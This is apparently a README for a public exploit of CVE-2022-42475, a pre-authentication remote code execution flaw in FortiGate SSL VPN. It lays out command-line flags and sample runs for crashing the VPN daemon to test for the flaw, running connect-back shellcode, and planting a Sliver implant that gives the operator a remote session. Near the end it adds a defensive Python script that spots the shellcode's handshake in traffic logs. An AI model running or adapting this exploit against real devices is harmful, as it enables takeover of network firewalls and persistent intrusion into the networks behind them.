## https://sploitus.com/exploit?id=77A82210-BA24-58B5-8539-C0177DA9E1FB
# CVE-2022-42475
## Background
This is the exploit for the blog post here: https://bishopfox.com/blog/exploit-cve-2022-42475
## Redacted Version
This version of the exploit will not work without you, the hacker, supplying the necessary memory addresses for ROP gadgets, etc. The work to determine this data is confidential and proprietary to Bishop Fox, and I will not (cannot) publish it alongside this exploit. I trust you understand!
## Modes of operation
* __Validate only, no exploit__. Determines whether the target is vulnerable. No payload, no shellcode.
* __Exploit, but verify only__. Run benign connect-back "ping" shellcode to verify the target is exploitable.
* __Exploit with connect-back binary stager__. The shellcode connects back to the exploit, downloads an encrypted operator-supplied binary file (typically [Sliver](https://github.com/BishopFox/Sliver)), decrypts the binary, then calls `execve(binary_file)`.
**Note**: At present the "validate only" mode works across all known versions of FortiOS. However, exploits work _only_ against FortiOS 6.0.4 on 100D hardware. I no longer work at BF and therefore cannot publish the expanded exploit that supports something like 18k targets.
## Requirements
* PyCrypto
* pycryptodome
```
pip3 install PyCrypto
pip3 install pycryptodome
```
## Validate only
This mode makes no attempt to exploit the bug; it only triggers it as a crash (the remote SSL VPN daemon restarts automatically and immediately). The crash is detected heuristically and reported to the operator.
Run it using the `-v` validate flag:
```
$ ./x.py -t 192.168.0.10 -p 8443 -v
--[ CVE-2022-42475: FortiGate Remote Pre-auth RCE ]--
--[ Bishop Fox Cosmos Team X ]--
[+] Running in validate-only mode. No RCE.
[>] Testing to see if target is vulnerable (may take 10 seconds)
[+] Target '192.168.0.10:8443' appears to be VULNERABLE
```
## Exploit, but validate (feature only available for FortiOS 6.0.4 on 100D appliances at present)
This will trigger the bug, deploy a ROP chain, and jump to shellcode. The shellcode is benign and works as follows:
* Exploit connects to target and triggers the vuln to execute shellcode
* Shellcode connects back to operator's IP:port
* Shellcode sends a single "hello" byte to the exploit: `0xbf`
* Exploit delivers a small encrypted test payload to the shellcode (AES key is random each run)
* Shellcode decrypts the payload and saves it to `/tmp/x` on the FortiGate appliance
* Shellcode sends another single `0xbf` byte to the exploit if payload decryption was successful
* Exploit reads the byte and confirms code execution.
Flags:
```
-t target host/IP
-p target port
-e exploit mode
-c connect-back only mode
-H and -P operator's IP:port (required)
-s software version of FortiOS (required)
-m hardware model running FortiOS
-d turn on debugging
```
An example where we select both software version `6.0.4` and the appliance model `100D`:
```
┌──(kali㉿kali)-[/mnt/hgfs/fortios/CVE-2022-42475]
└─$ sudo ./x.py -t 192.168.0.10 -p 8443 -e -c -H 192.168.0.99 -P 443 -s 6.0.4 -m 100D 130 ⨯
--[ CVE-2022-42475: FortiGate Remote Pre-auth RCE ]--
--[ Bishop Fox Cosmos Team X ]--
[+] Generating random 128-bit AES key to encrypt payload
[+] Encrypting payload...
[+] Using cached shellcode. Edit ./x.py (look for 'shellcode.s') to force refresh.
[+] Configured for connect-back to 192.168.0.99:443
[+] Starting encrypted payload listener...
[+] Preparing for exploit...
[+] Sending request!
[+] Importing gadgets from 'exploit_data.json'
[<] Listener bound to port 443, waiting for connect-back...
[+] Validating gadgets...
[!] No functional hardware models were defined for FortiOS '5.2.14'. Removed.
[!] No functional hardware models were defined for FortiOS '5.6.9'. Removed.
[+] Imported 797 targets:
[-] 6.0.4 [ 1 targets ] <=== 100D
[-] 5.2.14 [ 47 targets ]
[-] 5.6.9 [ 60 targets ]
[-] 6.0.13 [ 68 targets ]
[-] 6.0.14 [ 67 targets ]
[-] 6.0.15 [ 58 targets ]
[-] 6.0.8 [ 67 targets ]
[-] 6.2.11 [ 69 targets ]
[-] 6.2.7 [ 75 targets ]
[-] 6.4.10 [ 71 targets ]
[-] 6.4.2 [ 62 targets ]
[-] 6.4.3 [ 61 targets ]
[-] 6.4.6 [ 73 targets ]
[-] 6.4.9 [ 72 targets ]
[-] 7.0.4 [ 53 targets ]
[+] Starting exploit
[<] Incoming request from 192.168.0.10:22470
[<] Received hello packet from target!! Model #: 100D
[<] Sending encrypted payload of 36 bytes
[<] Finished sending payload (36 bytes), waiting for response...
[<] Received the expected response ('100D') from 192.168.0.10
[<] Target is VULNERABLE with 100% confidence.
[+] All done!
```
If you omit the `-m` hardware model flag, the exploit will brute-force all hardware targets for the specified software version.
## Global thermonuclear warfare
* Operator specifies the location of a Sliver implant binary (Linux-based)
* Exploit connects to target and triggers the vuln to execute shellcode
* Shellcode connects back to operator's IP:port
* Shellcode sends a single "hello" byte to the exploit: `0xbf`
* Exploit encrypts Sliver binary and sends it to the shellcode
* Shellcode decrypts the binary and saves it to `/tmp/x`
* Shellcode sends a "success" `0xbf` byte to the exploit
* Exploit reads the byte and confirms code execution
* Shellcode calls `execve("/tmp/x")`
* ???
* Profit!
Flags:
```
-t target host/IP
-p target port
-e exploit mode
-f filename /path/to/binary/to/execve/on/target
-H and -P operator's IP:port for connect-back (required)
-s software version of FortiOS (required)
-m hardware model running FortiOS
-d turn on debugging
```
Sliver:
```
carl@pluto:~$ ./sliver-server_linux
.------..------..------..------..------..------.
|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |
| :/\: || :/\: || (\/) || :(): || (\/) || :(): |
| :\/: || (__) || :\/: || ()() || :\/: || ()() |
| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|
`------'`------'`------'`------'`------'`------'
All hackers gain living weapon
[*] Server v1.5.34 - d2a6fa8cd6cc029818dd8d9e4a039bdea8071ca2
[*] Welcome to the sliver shell, please type 'help' for options
[server] sliver > mtls -l 8888
[*] Starting mTLS listener ...
[*] Successfully started job #1
```
Exploit:
```
$ ./x.py -t 192.168.0.10 -p 8443 -e -f implant5 -H 192.168.0.99 -P 443 -s 6.0.4 -m 100D
--[ CVE-2022-42475: FortiGate Remote Pre-auth RCE ]--
--[ Bishop Fox Cosmos Team X ]--
[+] Exploit will attempt to execve("implant5") on the target
...
[<] Target is VULNERABLE with 100% confidence.
[+] All done.
```
And back in Sliver:
```
[*] Session d8d5344b implant5 - 192.168.0.10:3500 (Burnet) - linux/amd64 - Mon, 06 Mar 2023 22:18:30 MST
[server] sliver > use d8d5344b-c666-4c60-9e33-5ce50eb82cad
[*] Active session implant5 (d8d5344b-c666-4c60-9e33-5ce50eb82cad)
[server] sliver (implant5) > whoami
Logon ID: <err>
[server] sliver (implant5) > ls
/ (19 items, 10.0 KiB)
======================
-rw-r--r-- .ash_history 590 B Tue Jan 31 11:31:57 +0000 2023
drwxr-xr-x bin <dir> Tue Jan 31 11:04:35 +0000 2023
drwxr-xr-x data <dir> Tue Jan 31 05:24:10 +0000 2023
drwxr-xr-x data2 <dir> Tue Jan 31 11:40:01 +0000 2023
drwxr-xr-x dev <dir> Tue Jan 31 05:26:16 +0000 2023
Lrwxrwxrwx etc -> data/etc 8 B Mon Jan 07 18:03:23 +0000 2019
Lrwxrwxrwx fortidev -> / 1 B Mon Jan 07 18:03:23 +0000 2019
Lrwxrwxrwx init -> /sbin/init 10 B Mon Jan 07 18:03:23 +0000 2019
drwxr-xr-x lib <dir> Mon Jan 07 18:03:30 +0000 2019
Lrwxrwxrwx lib64 -> lib 3 B Mon Jan 07 18:03:23 +0000 2019
drwxr-xr-x migadmin <dir> Tue Jan 31 05:23:26 +0000 2023
dr-xr-xr-x proc <dir> Tue Jan 31 05:23:13 +0000 2023
drwx------ root <dir> Mon Jan 07 17:17:34 +0000 2019
drwxr-xr-x sbin <dir> Tue Jan 31 05:23:27 +0000 2023
drwxr-xr-x security-rating <dir> Mon Jan 07 18:01:04 +0000 2019
drwxr-xr-x sys <dir> Tue Jan 31 05:23:27 +0000 2023
dtrwxrwxrwx tmp <dir> Tue Jan 31 11:40:01 +0000 2023
drwxr-xr-x usr <dir> Tue Jan 31 05:23:27 +0000 2023
drwxr-xr-x var <dir> Tue Jan 31 05:24:07 +0000 2023
```
Note that Sliver returns `<err>` because FortiOS is kinda mostly sorta Linux, and doesn't always work the way that you'd expect. This is an issue with FortiOS, not Sliver.
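The connect-back exchange described in the two sections above (a single `0xbf` hello byte from the appliance, an encrypted payload from the operator, then a second `0xbf` success byte) is cleartext apart from the payload itself, so it is also a detection signal. The Python below is an added defender-side example, not part of this exploit or of Bishop Fox's code: it triages constructed flow summaries for connections initiated by an appliance and flags those that reproduce the handshake or go to a peer outside an allow-list. The `Flow` shape, the sample records, `APPLIANCE_IPS` and `EXPECTED_PEERS` are assumptions; in practice they would be filled from connection logs. The daemon crash and restart caused by validate-only mode is a separate host-side signal that this example does not cover.

```python
from dataclasses import dataclass
from typing import List, Sequence, Tuple

# Single "hello" / "success" byte the README's shellcode sends to the operator.
HELLO = b"\xbf"


@dataclass
class Flow:
    """One TCP connection, summarised as ordered application-data messages.
    Hypothetical shape; a real feed would be built from connection logs."""
    src: str                  # initiator (the appliance side in the README's exchange)
    dst: str                  # peer it connected to (the operator's -H address)
    dport: int                # peer port (the operator's -P port)
    client_msgs: List[bytes]  # initiator-to-peer messages, in order
    server_msgs: List[bytes]  # peer-to-initiator messages, in order


def matches_connect_back(flow: Flow) -> bool:
    """True when the flow reproduces the stager handshake described above:
    the initiator sends exactly one 0xbf byte, the peer answers with a
    non-empty blob (the encrypted payload), and the initiator sends exactly
    one 0xbf byte again. A normal TLS session starts with a 0x16 record byte,
    so a bare 0xbf first byte already stands out."""
    c, s = flow.client_msgs, flow.server_msgs
    if len(c) < 2 or len(s) < 1:
        return False
    return c[0] == HELLO and len(s[0]) > 0 and c[1] == HELLO


def triage(flows: Sequence[Flow], appliance_ips: set,
           expected_peers: set) -> List[Tuple[Flow, List[str]]]:
    """Return (flow, reasons) for every connection initiated by an appliance
    that shows the handshake and/or reaches a peer not in the allow-list."""
    findings = []
    for f in flows:
        if f.src not in appliance_ips:
            continue
        reasons = []
        if matches_connect_back(f):
            reasons.append("0xbf hello/ack handshake")
        if f.dst not in expected_peers:
            reasons.append("unexpected outbound peer")
        if reasons:
            findings.append((f, reasons))
    return findings


# --- Constructed sample data (not captured traffic) --------------------------
APPLIANCE_IPS = {"192.168.0.10"}   # the README's target address
EXPECTED_PEERS = {"10.0.0.5"}      # hypothetical allow-listed update host
SAMPLE_FLOWS = [
    # Mirrors the README's exchange: hello, 36-byte encrypted payload, success byte.
    Flow("192.168.0.10", "192.168.0.99", 443, [HELLO, HELLO], [bytes(range(36))]),
    # Ordinary TLS session to an allow-listed peer (record type 0x16 = handshake).
    Flow("192.168.0.10", "10.0.0.5", 443,
         [b"\x16\x03\x01\x00\x05"], [b"\x16\x03\x03\x00\x05"]),
    # Same handshake from a host that is not an appliance: out of scope here.
    Flow("192.168.0.50", "192.168.0.99", 443, [HELLO, HELLO], [bytes(range(36))]),
]

if __name__ == "__main__":
    for flow, reasons in triage(SAMPLE_FLOWS, APPLIANCE_IPS, EXPECTED_PEERS):
        print(f"{flow.src} -> {flow.dst}:{flow.dport}: {', '.join(reasons)}")
```

Run stand-alone, the script reports only the first sample flow, with both reasons. The peer allow-list check is deliberately independent of the handshake check: a firewall management address opening an outbound connection to an arbitrary host on an arbitrary port is worth a look even when the bytes do not match this particular stager.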
## More versions coming soon
I no longer work at Bishop Fox so you'll need to follow the BF github for updates on this.